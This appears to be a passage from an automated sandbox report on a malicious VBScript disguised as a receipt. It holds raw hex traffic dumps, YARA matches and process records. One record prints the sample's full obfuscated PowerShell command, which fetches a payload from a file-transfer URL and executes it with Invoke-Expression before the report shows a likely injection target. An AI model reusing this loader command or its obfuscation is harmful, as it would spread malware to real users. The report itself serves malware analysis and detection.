                            2021-09-14 19:32:54 UTC431INData Raw: 30 2d 33 30 2d 33 30 2d 33 30 2d 33 37 2d 33 30 2d 33 32 2d 33 30 2d 33 37 2d 33 37 2d 34 35 2d 34 35 2d 33 30 2d 33 30 2d 33 30 2d 33 30 2d 33 32 2d 33 38 2d 33 34 2d 34 34 2d 33 30 2d 33 30 2d 33 30 2d 33 30 2d 33 30 2d 33 36 2d 33 32 2d 33 30 2d 33 36 2d 34 35 2d 34 35 2d 33 38 2d 33 30 2d 33 30 2d 33 30 2d 33 30 2d 33 32 2d 33 38 2d 33 34 2d 33 33 2d 33 30 2d 33 30 2d 33 30 2d 33 30 2d 33 30 2d 33 36 2d 33 32 2d 33 30 2d 33 31 2d 33 36 2d 34 36 2d 33 33 2d 33 30 2d 33 30 2d 33 30 2d 33 30 2d 33 32 2d 33 38 2d 33 33 2d 33 39 2d 33 30 2d 33 30 2d 33 30 2d 33 30 2d 33 30 2d 33 36 2d 33 32 2d 33 30 2d 33 36 2d 34 31 2d 34 35 2d 33 31 2d 33 30 2d 33 30 2d 33 30 2d 33 30 2d 33 32 2d 33 38 2d 33 32 2d 34 36 2d 33 30 2d 33 30 2d 33 30 2d 33 30 2d 33 30 2d 33
                            Data Ascii: 0-30-30-30-37-30-32-30-37-37-45-45-30-30-30-30-32-38-34-44-30-30-30-30-30-36-32-30-36-45-45-38-30-30-30-30-32-38-34-33-30-30-30-30-30-36-32-30-31-36-46-33-30-30-30-30-32-38-33-39-30-30-30-30-30-36-32-30-36-41-45-31-30-30-30-30-32-38-32-46-30-30-30-30-30-3
                            2021-09-14 19:32:54 UTC438INData Raw: 2d 33 31 2d 34 33 2d 33 36 2d 33 33 2d 33 36 2d 33 36 2d 33 31 2d 34 33 2d 33 36 2d 33 33 2d 33 32 2d 34 32 2d 33 34 2d 33 39 2d 33 32 2d 33 38 2d 33 31 2d 33 30 2d 33 30 2d 33 30 2d 33 30 2d 33 30 2d 33 30 2d 34 31 2d 33 30 2d 33 36 2d 33 32 2d 33 38 2d 33 31 2d 33 37 2d 33 30 2d 33 30 2d 33 30 2d 33 30 2d 33 30 2d 34 31 2d 33 32 2d 34 32 2d 33 36 2d 33 31 2d 33 31 2d 33 32 2d 33 30 2d 33 32 2d 33 32 2d 33 38 2d 33 31 2d 33 38 2d 33 30 2d 33 30 2d 33 30 2d 33 30 2d 33 30 2d 34 31 2d 33 32 2d 33 33 2d 33 30 2d 33 30 2d 33 30 2d 33 30 2d 33 30 2d 33 30 2d 33 30 2d 33 30 2d 33 30 2d 33 30 2d 33 30 2d 33 30 2d 33 30 2d 33 30 2d 33 30 2d 33 30 2d 33 33 2d 33 36 2d 33 30 2d 33 32 2d 33 32 2d 34 32 2d 33 30 2d 34 33 2d 33 32 2d 34 32 2d 33 34 2d 33 35 2d 33 33
                            Data Ascii: -31-43-36-33-36-36-31-43-36-33-32-42-34-39-32-38-31-30-30-30-30-30-30-41-30-36-32-38-31-37-30-30-30-30-30-41-32-42-36-31-31-32-30-32-32-38-31-38-30-30-30-30-30-41-32-33-30-30-30-30-30-30-30-30-30-30-30-30-30-30-30-30-33-36-30-32-32-42-30-43-32-42-34-35-33
                            2021-09-14 19:32:54 UTC445INData Raw: 33 38 2d 33 36 2d 33 35 2d 33 32 2d 33 30 2d 34 32 2d 34 33 2d 34 36 2d 33 38 2d 33 37 2d 33 32 2d 33 30 2d 33 33 2d 33 32 2d 33 30 2d 34 32 2d 33 36 2d 34 36 2d 33 38 2d 33 37 2d 33 32 2d 33 30 2d 33 33 2d 33 35 2d 33 39 2d 33 32 2d 33 30 2d 33 33 2d 33 32 2d 33 33 2d 33 39 2d 33 34 2d 34 31 2d 33 31 2d 33 33 2d 33 36 2d 33 36 2d 33 32 2d 33 30 2d 33 37 2d 33 37 2d 33 37 2d 33 36 2d 34 32 2d 33 35 2d 33 32 2d 33 35 2d 33 35 2d 33 38 2d 33 32 2d 33 30 2d 33 36 2d 34 31 2d 33 33 2d 34 34 2d 33 36 2d 34 32 2d 33 31 2d 33 32 2d 33 35 2d 33 39 2d 33 36 2d 33 36 2d 33 32 2d 33 30 2d 34 35 2d 33 32 2d 34 34 2d 33 32 2d 34 32 2d 33 36 2d 33 31 2d 33 36 2d 33 32 2d 33 30 2d 33 31 2d 34 35 2d 33 31 2d 34 34 2d 33 34 2d 33 39 2d 34 35 2d 33 39 2d 33 35 2d 33 38 2d
                            Data Ascii: 38-36-35-32-30-42-43-46-38-37-32-30-33-32-30-42-36-46-38-37-32-30-33-35-39-32-30-33-32-33-39-34-41-31-33-36-36-32-30-37-37-37-36-42-35-32-35-35-38-32-30-36-41-33-44-36-42-31-32-35-39-36-36-32-30-45-32-44-32-42-36-31-36-32-30-31-45-31-44-34-39-45-39-35-38-
                            2021-09-14 19:32:54 UTC453INData Raw: 30 2d 33 30 2d 33 30 2d 33 30 2d 33 30 2d 34 31 2d 33 33 2d 33 38 2d 34 31 2d 33 30 2d 33 30 2d 33 30 2d 33 30 2d 33 30 2d 33 30 2d 33 30 2d 33 31 2d 33 32 2d 33 30 2d 33 30 2d 33 32 2d 33 30 2d 33 37 2d 33 39 2d 33 32 2d 34 33 2d 34 36 2d 34 36 2d 33 32 2d 33 37 2d 33 36 2d 33 36 2d 33 32 2d 33 30 2d 33 32 2d 33 35 2d 33 36 2d 33 31 2d 34 31 2d 33 38 2d 33 30 2d 33 31 2d 33 35 2d 33 39 2d 33 32 2d 33 30 2d 33 32 2d 33 36 2d 34 35 2d 33 38 2d 34 36 2d 34 36 2d 33 32 2d 33 32 2d 33 35 2d 33 38 2d 33 36 2d 33 36 2d 33 32 2d 33 30 2d 33 37 2d 33 30 2d 34 31 2d 33 35 2d 34 31 2d 33 37 2d 33 30 2d 33 36 2d 33 35 2d 33 39 2d 33 32 2d 33 38 2d 33 31 2d 34 36 2d 33 30 2d 33 30 2d 33 30 2d 33 30 2d 33 30 2d 34 31 2d 33 32 2d 34 32 2d 33 33 2d 33 39 2d 33 31 2d 33
                            Data Ascii: 0-30-30-30-30-41-33-38-41-30-30-30-30-30-30-30-31-32-30-30-32-30-37-39-32-43-46-46-32-37-36-36-32-30-32-35-36-31-41-38-30-31-35-39-32-30-32-36-45-38-46-46-32-32-35-38-36-36-32-30-37-30-41-35-41-37-30-36-35-39-32-38-31-46-30-30-30-30-30-41-32-42-33-39-31-3
                            2021-09-14 19:32:54 UTC460INData Raw: 2d 34 36 2d 34 35 2d 33 30 2d 33 39 2d 33 30 2d 33 32 2d 33 30 2d 33 30 2d 33 32 2d 33 30 2d 34 36 2d 33 36 2d 33 31 2d 33 32 2d 34 35 2d 34 36 2d 34 32 2d 34 34 2d 33 36 2d 33 36 2d 33 32 2d 33 30 2d 33 32 2d 34 35 2d 33 35 2d 33 37 2d 34 35 2d 33 30 2d 34 36 2d 33 38 2d 33 35 2d 33 38 2d 33 32 2d 33 30 2d 34 32 2d 34 36 2d 33 30 2d 33 32 2d 33 30 2d 34 34 2d 34 34 2d 34 34 2d 33 36 2d 33 31 2d 33 36 2d 33 36 2d 33 36 2d 33 35 2d 33 32 2d 33 30 2d 34 32 2d 33 31 2d 34 34 2d 34 33 2d 34 34 2d 33 32 2d 33 31 2d 33 38 2d 33 36 2d 33 31 2d 33 36 2d 33 35 2d 33 32 2d 33 30 2d 33 34 2d 33 37 2d 33 39 2d 34 31 2d 33 32 2d 34 35 2d 34 36 2d 34 36 2d 33 35 2d 33 38 2d 33 35 2d 34 36 2d 33 39 2d 33 31 2d 34 36 2d 34 35 2d 33 30 2d 33 39 2d 33 30 2d 33 32 2d 33 30
                            Data Ascii: -46-45-30-39-30-32-30-30-32-30-46-36-31-32-45-46-42-44-36-36-32-30-32-45-35-37-45-30-46-38-35-38-32-30-42-46-30-32-30-44-44-44-36-31-36-36-36-35-32-30-42-31-44-43-44-32-31-38-36-31-36-35-32-30-34-37-39-41-32-45-46-46-35-38-35-46-39-31-46-45-30-39-30-32-30
                            2021-09-14 19:32:54 UTC467INData Raw: 33 34 2d 33 30 2d 33 30 2d 34 34 2d 33 37 2d 33 30 2d 33 32 2d 33 33 2d 33 36 2d 33 30 2d 33 30 2d 34 32 2d 34 35 2d 33 30 2d 33 32 2d 34 34 2d 34 32 2d 33 30 2d 33 32 2d 33 30 2d 33 31 2d 33 30 2d 33 30 2d 34 33 2d 33 35 2d 33 30 2d 33 32 2d 34 36 2d 33 32 2d 33 30 2d 33 31 2d 33 33 2d 33 31 2d 33 30 2d 33 30 2d 34 32 2d 33 35 2d 33 30 2d 33 30 2d 34 35 2d 34 33 2d 33 30 2d 33 32 2d 33 33 2d 33 36 2d 33 30 2d 33 30 2d 34 32 2d 34 35 2d 33 30 2d 33 30 2d 34 36 2d 33 30 2d 33 30 2d 33 32 2d 33 30 2d 33 31 2d 33 30 2d 33 30 2d 34 33 2d 33 30 2d 33 30 2d 33 30 2d 34 36 2d 33 32 2d 33 30 2d 33 31 2d 33 30 2d 33 30 2d 33 30 2d 33 30 2d 33 30 2d 33 30 2d 33 30 2d 33 30 2d 33 38 2d 33 30 2d 33 30 2d 33 30 2d 33 39 2d 33 31 2d 33 32 2d 33 30 2d 34 32 2d 33 35 2d
                            Data Ascii: 34-30-30-44-37-30-32-33-36-30-30-42-45-30-32-44-42-30-32-30-31-30-30-43-35-30-32-46-32-30-31-33-31-30-30-42-35-30-30-45-43-30-32-33-36-30-30-42-45-30-30-46-30-30-32-30-31-30-30-43-30-30-30-46-32-30-31-30-30-30-30-30-30-30-30-38-30-30-30-39-31-32-30-42-35-
                            2021-09-14 19:32:54 UTC474INData Raw: 30 2d 33 32 2d 34 31 2d 34 32 2d 33 30 2d 33 30 2d 33 30 2d 33 30 2d 33 32 2d 33 30 2d 33 30 2d 33 31 2d 33 30 2d 33 30 2d 34 32 2d 33 35 2d 33 30 2d 33 30 2d 33 30 2d 33 30 2d 33 30 2d 33 30 2d 33 30 2d 33 31 2d 33 30 2d 33 30 2d 34 32 2d 33 35 2d 33 30 2d 33 30 2d 33 30 2d 33 30 2d 33 32 2d 33 30 2d 33 30 2d 33 32 2d 33 30 2d 33 30 2d 34 32 2d 34 35 2d 33 30 2d 33 30 2d 33 30 2d 33 30 2d 33 30 2d 33 30 2d 33 30 2d 33 31 2d 33 30 2d 33 30 2d 34 32 2d 33 35 2d 33 30 2d 33 30 2d 33 30 2d 33 30 2d 33 30 2d 33 30 2d 33 30 2d 33 32 2d 33 30 2d 33 30 2d 34 32 2d 34 35 2d 33 30 2d 33 30 2d 33 30 2d 33 30 2d 33 30 2d 33 30 2d 33 30 2d 33 31 2d 33 30 2d 33 30 2d 33 38 2d 34 33 2d 33 30 2d 33 30 2d 33 30 2d 33 30 2d 33 30 2d 33 30 2d 33 30 2d 33 32 2d 33 30 2d 33
                            Data Ascii: 0-32-41-42-30-30-30-30-32-30-30-31-30-30-42-35-30-30-30-30-30-30-30-31-30-30-42-35-30-30-30-30-32-30-30-32-30-30-42-45-30-30-30-30-30-30-30-31-30-30-42-35-30-30-30-30-30-30-30-32-30-30-42-45-30-30-30-30-30-30-30-31-30-30-38-43-30-30-30-30-30-30-30-32-30-3
                            2021-09-14 19:32:54 UTC482INData Raw: 2d 34 36 2d 33 33 2d 33 30 2d 33 33 2d 34 32 2d 33 32 2d 33 30 2d 33 30 2d 34 34 2d 33 31 2d 33 30 2d 33 30 2d 34 36 2d 33 33 2d 33 30 2d 33 33 2d 34 36 2d 33 34 2d 33 30 2d 33 32 2d 34 34 2d 33 39 2d 33 30 2d 33 30 2d 34 36 2d 33 33 2d 33 30 2d 33 33 2d 34 32 2d 33 32 2d 33 30 2d 33 30 2d 34 35 2d 33 31 2d 33 30 2d 33 30 2d 34 36 2d 33 33 2d 33 30 2d 33 33 2d 33 32 2d 33 31 2d 33 30 2d 33 33 2d 34 36 2d 33 31 2d 33 30 2d 33 30 2d 34 36 2d 33 33 2d 33 30 2d 33 33 2d 33 33 2d 33 30 2d 33 30 2d 33 33 2d 34 36 2d 33 39 2d 33 30 2d 33 30 2d 34 36 2d 33 33 2d 33 30 2d 33 33 2d 33 33 2d 33 30 2d 33 30 2d 33 33 2d 33 30 2d 33 31 2d 33 30 2d 33 31 2d 34 36 2d 33 33 2d 33 30 2d 33 33 2d 33 33 2d 33 30 2d 33 30 2d 33 33 2d 33 30 2d 33 39 2d 33 30 2d 33 31 2d 34 36
                            Data Ascii: -46-33-30-33-42-32-30-30-44-31-30-30-46-33-30-33-46-34-30-32-44-39-30-30-46-33-30-33-42-32-30-30-45-31-30-30-46-33-30-33-32-31-30-33-46-31-30-30-46-33-30-33-33-30-30-33-46-39-30-30-46-33-30-33-33-30-30-33-30-31-30-31-46-33-30-33-33-30-30-33-30-39-30-31-46
                            2021-09-14 19:32:54 UTC489INData Raw: 33 30 2d 33 35 2d 33 33 2d 33 37 2d 33 34 2d 33 37 2d 33 32 2d 33 36 2d 33 39 2d 33 36 2d 34 35 2d 33 36 2d 33 37 2d 33 30 2d 33 30 2d 33 36 2d 33 37 2d 33 36 2d 33 35 2d 33 37 2d 33 34 2d 33 35 2d 34 36 2d 33 34 2d 34 33 2d 33 36 2d 33 35 2d 33 36 2d 34 35 2d 33 36 2d 33 37 2d 33 37 2d 33 34 2d 33 36 2d 33 38 2d 33 30 2d 33 30 2d 33 36 2d 33 39 2d 33 30 2d 33 30 2d 33 36 2d 34 31 2d 33 30 2d 33 30 2d 33 34 2d 33 31 2d 33 37 2d 33 33 2d 33 37 2d 33 39 2d 33 36 2d 34 35 2d 33 36 2d 33 33 2d 33 34 2d 33 33 2d 33 36 2d 33 31 2d 33 36 2d 34 33 2d 33 36 2d 34 33 2d 33 36 2d 33 32 2d 33 36 2d 33 31 2d 33 36 2d 33 33 2d 33 36 2d 34 32 2d 33 30 2d 33 30 2d 33 34 2d 34 34 2d 33 36 2d 33 31 2d 33 37 2d 33 32 2d 33 37 2d 33 33 2d 33 36 2d 33 38 2d 33 36 2d 33 31 2d
                            Data Ascii: 30-35-33-37-34-37-32-36-39-36-45-36-37-30-30-36-37-36-35-37-34-35-46-34-43-36-35-36-45-36-37-37-34-36-38-30-30-36-39-30-30-36-41-30-30-34-31-37-33-37-39-36-45-36-33-34-33-36-31-36-43-36-43-36-32-36-31-36-33-36-42-30-30-34-44-36-31-37-32-37-33-36-38-36-31-
                            2021-09-14 19:32:54 UTC496INData Raw: 30 2d 33 35 2d 33 30 2d 33 38 2d 33 30 2d 33 34 2d 33 30 2d 33 30 2d 33 30 2d 33 31 2d 33 30 2d 33 38 2d 33 30 2d 33 39 2d 33 30 2d 33 35 2d 33 30 2d 33 30 2d 33 30 2d 33 31 2d 33 31 2d 33 32 2d 33 33 2d 34 34 2d 33 30 2d 33 38 2d 33 30 2d 33 34 2d 33 30 2d 34 31 2d 33 30 2d 33 31 2d 33 31 2d 33 32 2d 33 30 2d 34 33 2d 33 30 2d 33 34 2d 33 30 2d 34 31 2d 33 30 2d 33 31 2d 33 31 2d 33 32 2d 33 31 2d 33 30 2d 33 30 2d 33 34 2d 33 30 2d 34 31 2d 33 30 2d 33 31 2d 33 31 2d 33 32 2d 33 31 2d 33 34 2d 33 30 2d 33 34 2d 33 30 2d 34 31 2d 33 30 2d 33 31 2d 33 31 2d 33 32 2d 33 31 2d 33 38 2d 33 30 2d 33 34 2d 33 30 2d 34 31 2d 33 30 2d 33 31 2d 33 31 2d 33 32 2d 33 31 2d 34 33 2d 33 30 2d 33 34 2d 33 30 2d 34 31 2d 33 30 2d 33 31 2d 33 31 2d 33 32 2d 33 32 2d 33
                            Data Ascii: 0-35-30-38-30-34-30-30-30-31-30-38-30-39-30-35-30-30-30-31-31-32-33-44-30-38-30-34-30-41-30-31-31-32-30-43-30-34-30-41-30-31-31-32-31-30-30-34-30-41-30-31-31-32-31-34-30-34-30-41-30-31-31-32-31-38-30-34-30-41-30-31-31-32-31-43-30-34-30-41-30-31-31-32-32-3
                            2021-09-14 19:32:54 UTC503INData Raw: 2d 33 34 2d 33 33 2d 33 30 2d 33 30 2d 33 36 2d 34 36 2d 33 30 2d 33 30 2d 33 36 2d 34 34 2d 33 30 2d 33 30 2d 33 36 2d 34 34 2d 33 30 2d 33 30 2d 33 36 2d 33 35 2d 33 30 2d 33 30 2d 33 36 2d 34 35 2d 33 30 2d 33 30 2d 33 37 2d 33 34 2d 33 30 2d 33 30 2d 33 37 2d 33 33 2d 33 30 2d 33 30 2d 33 30 2d 33 30 2d 33 30 2d 33 30 2d 33 30 2d 33 30 2d 33 30 2d 33 30 2d 33 30 2d 33 30 2d 33 30 2d 33 30 2d 33 32 2d 33 32 2d 33 30 2d 33 30 2d 33 30 2d 33 31 2d 33 30 2d 33 30 2d 33 30 2d 33 31 2d 33 30 2d 33 30 2d 33 34 2d 33 33 2d 33 30 2d 33 30 2d 33 36 2d 34 36 2d 33 30 2d 33 30 2d 33 36 2d 34 34 2d 33 30 2d 33 30 2d 33 37 2d 33 30 2d 33 30 2d 33 30 2d 33 36 2d 33 31 2d 33 30 2d 33 30 2d 33 36 2d 34 35 2d 33 30 2d 33 30 2d 33 37 2d 33 39 2d 33 30 2d 33 30 2d 33 34
                            Data Ascii: -34-33-30-30-36-46-30-30-36-44-30-30-36-44-30-30-36-35-30-30-36-45-30-30-37-34-30-30-37-33-30-30-30-30-30-30-30-30-30-30-30-30-30-30-32-32-30-30-30-31-30-30-30-31-30-30-34-33-30-30-36-46-30-30-36-44-30-30-37-30-30-30-36-31-30-30-36-45-30-30-37-39-30-30-34
                            2021-09-14 19:32:54 UTC510INData Raw: 37 39 2d 37 34 2d 36 35 2d 35 62 2d 35 64 2d 35 64 2d 32 34 2d 34 38 2d 33 36 2d 33 64 2d 32 30 2d 35 36 2d 34 39 2d 35 30 2d 32 30 2d 32 34 2d 34 38 2d 34 38 2d 30 61 2d 32 34 2d 36 31 2d 36 31 2d 32 30 2d 33 64 2d 32 30 2d 32 37 2d 34 65 2d 34 35 2d 35 34 2d 32 65 2d 35 30 2d 34 35 2d 32 37 2d 30 61 2d 32 34 2d 36 32 2d 36 32 2d 32 30 2d 33 64 2d 32 30 2d 32 37 2d 34 32 2d 36 31 2d 36 34 2d 36 37 2d 36 35 2d 37 32 2d 32 37 2d 30 61 2d 32 34 2d 36 66 2d 36 66 2d 32 30 2d 33 64 2d 32 37 2d 34 37 2d 36 35 2d 37 34 2d 34 38 2d 34 39 2d 35 33 2d 35 34 2d 34 66 2d 35 32 2d 35 32 2d 35 39 2d 32 37 2d 32 65 2d 35 32 2d 36 35 2d 37 30 2d 36 63 2d 36 31 2d 36 33 2d 36 35 2d 32 38 2d 32 32 2d 34 38 2d 34 39 2d 35 33 2d 35 34 2d 34 66 2d 35 32 2d 35 32 2d 35 39 2d
                            Data Ascii: 79-74-65-5b-5d-5d-24-48-36-3d-20-56-49-50-20-24-48-48-0a-24-61-61-20-3d-20-27-4e-45-54-2e-50-45-27-0a-24-62-62-20-3d-20-27-42-61-64-67-65-72-27-0a-24-6f-6f-20-3d-27-47-65-74-48-49-53-54-4f-52-52-59-27-2e-52-65-70-6c-61-63-65-28-22-48-49-53-54-4f-52-52-59-


                            Code Manipulations

                            Statistics

                            CPU Usage

                            Click to jump to process

                            Memory Usage

                            Click to jump to process

                            High Level Behavior Distribution

                            Click to dive into process behavior distribution

                            Behavior

                            Click to jump to process

                            System Behavior

                            General

                            Start time:21:31:57
                            Start date:14/09/2021
                            Path:C:\Windows\System32\wscript.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\System32\wscript.exe 'C:\Users\user\Desktop\18-ITEMS-RECEIPT.vbs'
                            Imagebase:0x7ff649000000
                            File size:163840 bytes
                            MD5 hash:9A68ADD12EB50DDE7586782C3EB9FF9C
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Yara matches:
                            • Rule: PowerShell_Case_Anomaly, Description: Detects obfuscated PowerShell hacktools, Source: 00000000.00000002.473770924.00000200A3E1A000.00000004.00000001.sdmp, Author: Florian Roth
                            • Rule: PowerShell_Case_Anomaly, Description: Detects obfuscated PowerShell hacktools, Source: 00000000.00000002.473686642.00000200A3E0A000.00000004.00000001.sdmp, Author: Florian Roth
                            • Rule: PowerShell_Case_Anomaly, Description: Detects obfuscated PowerShell hacktools, Source: 00000000.00000002.474801186.00000200A5B40000.00000004.00000001.sdmp, Author: Florian Roth
                            • Rule: PowerShell_Case_Anomaly, Description: Detects obfuscated PowerShell hacktools, Source: 00000000.00000003.472718525.00000200A3E1D000.00000004.00000001.sdmp, Author: Florian Roth
                            • Rule: PowerShell_Case_Anomaly, Description: Detects obfuscated PowerShell hacktools, Source: 00000000.00000002.473811647.00000200A3E1E000.00000004.00000001.sdmp, Author: Florian Roth
                            • Rule: PowerShell_Case_Anomaly, Description: Detects obfuscated PowerShell hacktools, Source: 00000000.00000003.471864422.00000200A3E05000.00000004.00000001.sdmp, Author: Florian Roth
                            • Rule: PowerShell_Case_Anomaly, Description: Detects obfuscated PowerShell hacktools, Source: 00000000.00000002.473965824.00000200A3E3C000.00000004.00000001.sdmp, Author: Florian Roth
                            • Rule: PowerShell_Case_Anomaly, Description: Detects obfuscated PowerShell hacktools, Source: 00000000.00000003.472493075.00000200A3E19000.00000004.00000001.sdmp, Author: Florian Roth
                            • Rule: PowerShell_Case_Anomaly, Description: Detects obfuscated PowerShell hacktools, Source: 00000000.00000003.472064698.00000200A3E13000.00000004.00000001.sdmp, Author: Florian Roth
                            • Rule: PowerShell_Case_Anomaly, Description: Detects obfuscated PowerShell hacktools, Source: 00000000.00000002.474462053.00000200A40B5000.00000004.00000040.sdmp, Author: Florian Roth
                            • Rule: PowerShell_Case_Anomaly, Description: Detects obfuscated PowerShell hacktools, Source: 00000000.00000003.472178505.00000200A3E09000.00000004.00000001.sdmp, Author: Florian Roth
                            • Rule: PowerShell_Case_Anomaly, Description: Detects obfuscated PowerShell hacktools, Source: 00000000.00000003.472641859.00000200A3E0A000.00000004.00000001.sdmp, Author: Florian Roth
                            • Rule: PowerShell_Case_Anomaly, Description: Detects obfuscated PowerShell hacktools, Source: 00000000.00000003.470540065.00000200A5B41000.00000004.00000001.sdmp, Author: Florian Roth
                            Reputation:high

                            General

                            Start time:21:31:59
                            Start date:14/09/2021
                            Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                            Wow64 process (32bit):false
                            Commandline:'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' $SZXDCFVGBHNJSDFGH = 'https://transferH-Hsh/ucAlHz/FGTEFRH-Htxt'.Replace('H-H','.');$SOS='%!-X-!5-X-!!-X-5%-X-!*-X-!7-X-!8-X-!e-X-!a-X-!d-X-!b-X-!!-X-!5-X-!*-X-!7-X-!8-X-!a-X-%0-X-3d-X-%0-X-%7-X-*e-X-!5-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-!5-X-*%-X-!3-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-5!-X-%7-X-%e-X-5%-X-*5-X-70-X-*c-X-*1-X-*3-X-*5-X-%8-X-%7-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%7-X-%c-X-%7-X-7!-X-%e-X-57-X-%7-X-%9-X-%e-X-5%-X-*5-X-70-X-*c-X-*1-X-*3-X-*5-X-%8-X-%7-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%7-X-%c-X-%7-X-*c-X-!9-X-!5-X-!e-X-%7-X-%9-X-3b-X-0a-X-%!-X-53-X-58-X-!!-X-!3-X-!*-X-5*-X-!7-X-!%-X-!8-X-!e-X-!a-X-58-X-!!-X-!3-X-!*-X-5*-X-!7-X-!%-X-!8-X-!a-X-!b-X-%0-X-3d-X-%0-X-%7-X-!!-X-!f-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-*1-X-!!-X-53-X-5!-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-!7-X-%7-X-%e-X-5%-X-*5-X-70-X-*c-X-*1-X-*3-X-*5-X-%8-X-%7-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%7-X-%c-X-%7-X-57-X-*e-X-!c-X-*f-X-%7-X-%9-X-%e-X-5%-X-*5-X-70-X-*c-X-*1-X-*3-X-*5-X-%8-X-%7-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-%7-X-%c-X-%7-X-7%-X-!9-X-*e-X-%7-X-%9-X-3b-X-0a-X-%!-X-53-X-57-X-58-X-!!-X-!5-X-!3-X-5%-X-!*-X-!7-X-59-X-!8-X-55-X-!a-X-!9-X-53-X-!!-X-!*-X-5*-X-!7-X-!8-X-!a-X-%0-X-3d-X-%7-X-!9-X-*0-X-!5-X-58-X-%8-X-*e-X-*0-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-*0-X-*3-X-*0-X-5!-X-%0-X-%!-X-!5-X-!!-X-5%-X-!*-X-!7-X-!8-X-!e-X-!a-X-!d-X-!b-X-!!-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-!7-X-!%-X-!8-X-!e-X-!a-X-53-X-!!-X-!*-X-!7-X-!8-X-%9-X-%7-X-%e-X-5%-X-*5-X-70-X-*c-X-*1-X-*3-X-*5-X-%8-X-%7-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%7-X-%c-X-%7-X-*5-X-*0-X-57-X-*0-X-%d-X-!f-X-*%-X-*a-X-*0-X-!5-X-%7-X-%9-X-%e-X-5%-X-*5-X-70-X-*c-X-*1-X-*3-X-*5-X-%8-X-%7-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-%7-X-%c-X-%7-X-!5-X-!*-X-!7-X-!8-X-!a-X-%9-X-%e-X-%!-X-53-X-58-X-!!-X-!3-X-!*-X-5*-X-!7-X-!%-X-!8-X-!e-X-!a-X-58-X-!!-X-!3-X-!*-X-5*-X-!7-X-!%-X-!8-X-!a-X-!b-X-%8-X-%!-X-53-X-5a-X-58-X-!!-X-!3-X-!*-X-5*-X-%7-X-%9-X-3b-X-0a-X-%*-X-%8-X-%7-X-!9-X-%7-X-%b-X-%7-X-!5-X-58-X-%7-X-%9-X-%8-X-%!-X-53-X-57-X-58-X-!!-X-!5-X-!3-X-5%-X-!*-X-!7-X-59-X-!8-X-55-X-!a-X-!9-X-53-X-!!-X-!*-X-5*-X-!7-X-!8-X-!a-X-%0-X-%d-X-!a-X-*f-X-*9-X-*e-X-%0-X-%7-X-%7-X-%9-X-7c-X-%*-X-%8-X-%7-X-!9-X-%7-X-%b-X-%7-X-!5-X-58-X-%7-X-%9-X-3b'.Replace('%','2').Replace('!','4').Replace('*','6');Invoke-Expression (-join ($SOS -split '-X-' | ? { $_ } | % { [char][convert]::ToUInt32($_,16) }))
                            Imagebase:0x7ff785e30000
                            File size:447488 bytes
                            MD5 hash:95000560239032BC68B4C2FDFCDEF913
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:.Net C# or VB.NET
                            Yara matches:
                            • Rule: PowerShell_Case_Anomaly, Description: Detects obfuscated PowerShell hacktools, Source: 00000003.00000003.276637155.000001E0B3ED1000.00000004.00000001.sdmp, Author: Florian Roth
                            • Rule: PowerShell_Case_Anomaly, Description: Detects obfuscated PowerShell hacktools, Source: 00000003.00000002.449196823.000001E0B4948000.00000004.00000001.sdmp, Author: Florian Roth
                            • Rule: PowerShell_Case_Anomaly, Description: Detects obfuscated PowerShell hacktools, Source: 00000003.00000002.423333288.000001E0B3230000.00000004.00020000.sdmp, Author: Florian Roth
                            Reputation:high

                            General

                            Start time:21:31:59
                            Start date:14/09/2021
                            Path:C:\Windows\System32\conhost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Imagebase:0x7ff6b2800000
                            File size:625664 bytes
                            MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Reputation:high

                            General

                            Start time:21:33:27
                            Start date:14/09/2021
                            Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                            Imagebase:0x50000
                            File size:55400 bytes
                            MD5 hash:17CC69238395DF61AAF483BCEF02E7C9
                            Has elevated privileges:true
